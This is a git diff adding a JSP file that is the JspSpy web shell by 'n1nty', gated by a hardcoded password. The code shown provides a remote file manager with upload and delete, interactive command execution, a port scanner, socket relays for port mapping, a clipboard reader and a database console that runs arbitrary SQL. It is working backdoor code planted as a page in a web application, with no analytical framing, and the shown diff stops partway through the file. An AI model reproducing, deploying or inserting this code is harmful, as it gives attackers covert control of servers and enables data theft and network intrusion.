diff --git a/jsp/000.jsp b/jsp/000.jsp new file mode 100644 index 0000000..ff0b2aa --- /dev/null +++ b/jsp/000.jsp @@ -0,0 +1,3312 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.lang.reflect.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.util.jar.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* by n1nty +* CY . I Love You. +*/ +private static final String PW = "shang"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static final String ENTER = "ENTER_FILE"; +private static final String ENTER_MSG = "ENTER_FILE_MSG"; +private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; +private static final String SESSION_O = "SESSION_O"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static boolean ISLINUX = false; + +private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; +private static final String BACK_HREF = " Back"; + +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class SpyClassLoader extends ClassLoader{ +public SpyClassLoader() { +} +public Class defineClass(String name,byte[] b) { +return super.defineClass(name,b,0,b.length - 2); +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return ""+stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +public Connection getConn(){ +return this.conn; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +} +private static class EnterFile extends File{ +private ZipFile zf = null; +private ZipEntry entry = null; +private boolean isDirectory = false; +private String absolutePath = null; +public void setEntry(ZipEntry e) { +this.entry = e; +} +public void setAbsolutePath(String p) { +this.absolutePath = p; +} +public void close() throws Exception{ +this.zf.close(); +} +public void setZf(String p) throws Exception{ +if (p.toLowerCase().endsWith(".jar")) +this.zf = new JarFile(p); +else +this.zf = new ZipFile(p); +} +public EnterFile(File parent, String child) { +super(parent,child); +} +public EnterFile(String pathname) { +super(pathname); +} +public EnterFile(String pathname,boolean isDir) { +this(pathname); +this.isDirectory = isDir; +} +public EnterFile(String parent, String child) { +super(parent,child); +} +public EnterFile(URI uri) { +super(uri); +} +public boolean exists(){ +return new File(this.zf.getName()).exists(); +} +public File[] listFiles() { +java.util.List list = new ArrayList(); +java.util.List handled = new ArrayList(); +String currentDir = super.getPath(); +currentDir = currentDir.replace('\\','/'); +if (currentDir.indexOf("/") == 0) +{ +if (currentDir.length() > 1) +currentDir = currentDir.substring(1); +else +currentDir = ""; +} +Enumeration e = this.zf.entries(); +while (e.hasMoreElements()) +{ +ZipEntry entry = (ZipEntry)e.nextElement(); +String eName = entry.getName(); +if (this.zf instanceof JarFile) { +if (!entry.isDirectory()){ +EnterFile ef = new EnterFile(eName); +ef.setEntry(entry); +try{ +ef.setZf(this.zf.getName()); +}catch(Exception ex) { +} +list.add(ef); +} +} else { +if (currentDir.equals("")) { +//zip root directory +if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$")) +{ +EnterFile ef = new EnterFile(eName.replaceAll("/","")); +handled.add(eName.replaceAll("/","")); +ef.setEntry(entry); +list.add(ef); +} else { +if (eName.indexOf("/") != -1) { +String tmp = eName.substring(0,eName.indexOf("/")); +if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { +EnterFile ef = new EnterFile(tmp,true); +ef.setEntry(entry); +list.add(ef); +handled.add(tmp); +} +} +} +} else { +if (eName.startsWith(currentDir)) { +if (eName.matches(currentDir+"/[^/]+/?$")) { +//file. +EnterFile ef = new EnterFile(eName); +ef.setEntry(entry); +list.add(ef); +if (eName.endsWith("/")) { +String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2)); +tmp = tmp.substring(1,tmp.length()-1); +handled.add(tmp); +} +} else { +//dir +try { +String tmp = eName.substring(currentDir.length()+1); +tmp = tmp.substring(0,tmp.indexOf('/')); +if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { +EnterFile ef = new EnterFile(tmp,true); +ef.setAbsolutePath(currentDir+"/"+tmp); +ef.setEntry(entry); +list.add(ef); +handled.add(tmp); +} +} catch (Exception ex) { +} +} +} +} +} +} +return (File[])list.toArray(new File[0]); +} +public boolean isDirectory(){ +return this.entry.isDirectory() || this.isDirectory; +} +public String getParent(){ +return ""; +} +public String getAbsolutePath(){ +return absolutePath != null ? absolutePath : super.getPath(); +} +public String getName(){ +if (this.zf instanceof JarFile) { +return this.getAbsolutePath(); +} else { +return super.getName(); +} +} +public long lastModified(){ +return entry.getTime(); +} +public boolean canRead(){ +return false; +} +public boolean canWrite(){ +return false; +} +public boolean canExecute(){ +return false; +} +public long length(){ +return entry.getSize(); +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">"); +str = str.replaceAll(""+(char)13+(char)10,"
"); +str = str.replaceAll("\n","
"); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuffer html = new StringBuffer(); +if (echoTableTag) +html.append(""); +for (int i = 0;i"); + ArrayList columns = r.getColumns(); +for (int a = 0;a"); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
"); +return html.toString(); +} +public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{ +StringBuffer table = new StringBuffer(); +ResultSetMetaData meta = rs.getMetaData(); +int count = meta.getColumnCount(); +if (!op) +table.append(" View Struct - View All Tables

"); +else +table.append(" All Tables

"); +table.append(""); +table.append(""); +for (int i = 1;i<=count;i++) { +table.append(""); +} +if (op) +table.append(""); +table.append(""); +while (rs.next()) { +String tbName = null; +table.append(""); +for (int i = 1;i<=count;i++) { +String v = rs.getString(i); +if (i == 3) +tbName = v; +table.append(""); +} +if (op) +table.append(""); +table.append(""); +} +table.append("
"+meta.getColumnName(i)+" 
"+Util.null2Nbsp(v)+" View | Struct | Export | Save To File

"); +return table.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static boolean exists(String[] arr,String v) { +for (int i =0;i",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String null2Nbsp(String s) { +if (s == null) +s = " "; +return s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +out.write("
"+msg+"
"); +} +public static String highLight(String str) { +str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","$1"); +str = str.replaceAll("\t(//.+)","\t$1"); +return str; +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private OutputStream targetOutput = null; +private byte[] b = new byte[1024]; +public void setTargetOutput(OutputStream stream) { +this.targetOutput = stream; +} +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public String getFileName(){ +return this.fileName; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() throws IOException{ +try { +OutputStream out = null; +if (this.targetOutput != null) +out = this.targetOutput; +else +out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +if (out instanceof FileOutputStream) +out.close(); +} catch (IOException ioe) { +throw ioe; +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (SHELL_DIR.indexOf('/') == 0) +ISLINUX = true; +else +ISLINUX = false; +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +((Invoker)ins.get("login")).invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +((Invoker)ins.get("vLogin")).invoke(request,response,session); +return; +} else { +((Invoker)ins.get("vLogin")).invoke(request,response,session); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { + +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Private Codz By - Ninty"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { + +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +int success = 0; +int failed = 0; +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (int i = 0;iSuccess , "+failed+" Files Deleted Failed!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

System Clipboard »

"+ +"

");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
"+ +" "+ +"

"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +String banner = request.getParameter("banner"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
"+ +"

PortScan >>

"+ +"
"+ +"

"+ +"IP : Port : Banner Timeout (Second) : "+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +((Invoker)ins.get("vPortScan")).invoke(request,response,JSession); +out.println("
"); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +String banner = request.getParameter("banner"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (int i =0;i"+sb.toString()+""); +r.close(); +} else { +rs.put(port,"Open"); +} +s.close(); +} catch (Exception e) { +if (e.toString().toLowerCase().indexOf("read timed out")!=-1) { +rs.put(port,"Open <<No Banner!>>"); +if (r != null) +r.close(); +} else { +rs.put(port,"Close"); +} +} +} +out.println("
"); +Set entrySet = rs.entrySet(); + Iterator it = entrySet.iterator(); + while (it.hasNext()) { + Map.Entry e = (Map.Entry)it.next(); + String port = (String)e.getKey(); + String value = (String)e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
"); +} +out.println("
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +} +} catch (ClassCastException e) { +throw e; +} catch (Exception e) { + +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) { +Ddbo.getConn().setCatalog(request.getParameter("catalog")); +} +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +DatabaseMetaData meta = Ddbo.getConn().getMetaData(); +out.println("
"+ +"

Version : "+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"
URL : "+meta.getURL()+"
Catalog : "+Ddbo.getConn().getCatalog()+"
UserName : "+meta.getUserName()+"

Run SQL query/queries on database / Switch Database : "); +out.println("

"); +if (Util.isEmpty(sql)) { +String type = request.getParameter("type"); +if (Util.isEmpty(type) || type.equals("switch")) { +ResultSet tbs = meta.getTables(null,null,null,null); +out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true)); +tbs.close(); +} else if (type.equals("struct")) { +String tb = request.getParameter("table"); +if (Util.isEmpty(tb)) +return; +ResultSet t = meta.getColumns(null,null,tb,null); +out.println(Table.rs2Table(t,"",false)); +t.close(); +} +} +} catch (Exception e) { +JSession.setAttribute(MSG,"Some Error Occurred. Please Check Out the StackTrace Follow."+BACK_HREF); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +((Invoker)ins.get("vConn")).invoke(request,response,JSession); +return; +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +String v = null; +try { +v = rs.getString(i); +} catch (SQLException ex) { +v = "<>"; +} +r.addColumn(new Column(v)); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"

"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("affected rows : "+obj+"

"); +} +} +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("jspspy
"+ +""+ +"

Password: "+ +" "+ +" "+ +" "+ +"
"+ +"

"+ +"
CY... I Love You. I Do! by n1nty 2010/8/18"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME); +return; +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(Object obj1,Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File)obj1; + File f2 = (File)obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +String path2View = null; +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +String outEntry = request.getParameter("outentry"); +if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { +JSession.removeAttribute(ENTER); +JSession.removeAttribute(ENTER_MSG); +JSession.removeAttribute(ENTER_CURRENT_DIR); +} +Object enter = JSession.getAttribute(ENTER); +File file = null; +if (!Util.isEmpty(enter)) { +if (Util.isEmpty(path)) { +if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) +path = "/"; +else +path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR)); +} +file = new EnterFile(path); +((EnterFile)file).setZf((String)enter); +JSession.setAttribute(ENTER_CURRENT_DIR,path); +} else { +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +file = new File(path); +} +path2View = Util.convertPath(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (int i = 0;i"+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow"); +if (enter != null) +out.println(" "); +else +out.println("Del | Move | Pack"); +out.println("
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy"); +if (enter == null ) { +out.println(" | Move | "+ +"Property | "+ +"Enter"); +if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +} +out.println("
 "); +if (enter != null) +out.println("Pack Selected - Delete Selected"); +else +out.println("Pack Selected - Delete Selected"); +out.println(""+dircount+" directories / "+filecount+" files
"); +out.println("
